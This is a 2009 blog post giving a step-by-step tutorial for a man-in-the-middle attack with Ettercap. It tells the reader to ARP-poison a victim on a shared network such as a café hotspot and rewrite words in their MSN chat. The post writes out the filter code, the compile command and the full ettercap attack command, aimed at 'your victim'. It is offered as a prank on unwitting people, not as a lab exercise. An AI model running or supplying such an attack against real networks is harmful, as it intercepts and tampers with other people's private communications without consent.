Tuesday, November 24, 2009

Ettercap and Filters (Pwning an MSN convo)

Ettercap is a multi-purpose sniffer that can perform man in the middle attacks on a switched network. It can sniff live connections and modify some of a packets contents on the fly. What im going to show you is how you can modify certain words from an ongoing MSN convo. You are gonna have to be on the same network so a perfect scenario would be at an interet cafe or wireless hotspot.
You would need to create a filter that would tell ettercap to filter out 'lol' in our example to whatever we want, in this case 'smh'.

Creating the filter:
# touch msn.txt
open msn.txt in a text editor and type the following:
if (ip.proto == TCP && search(DATA.data, "lol")) { replace("lol", "smh"); msg("filter ran"); }

Save and exit your work.
NB: Just to point out, there shouldn't be any space between the 'e' and '(' in the replace function, and 'DATA.data', its necessary for 'DATA' to be in all caps . This language is case sensitie so putting 'Data.data' would not work.

Next you need to compile the msn.txt text into a format that ettercap can understand
# etterfilter -o msn.ef msn.txt

Now we are ready to run ettercap with our newly created filter.
#ettercap -Tq -M ARP:remote -i wlan0 -F msn.ef /victim_with_msn_ip/ /router_ip/

Thats all. Now jst wait for your victim to send or recieve an 'lol' in the convo. Just like magic 'lol' turns to 'smh'. Just note that when u type 'lol', its gonna show up as 'lol' on your end but on the other end of the convo, its gonna show up as 'smh' and vice versa. Now feel free to accossiate the word ettercap and awsome in the same sentence with ease.

In all my tests i found that you always have to perform a man in the middle attack (like arp cahce poisoning) to get the ettercap filters working. Without the arp cache, the ettercap console will say that the filter was ran but my packets were not modified or affected.

No comments:

Post a Comment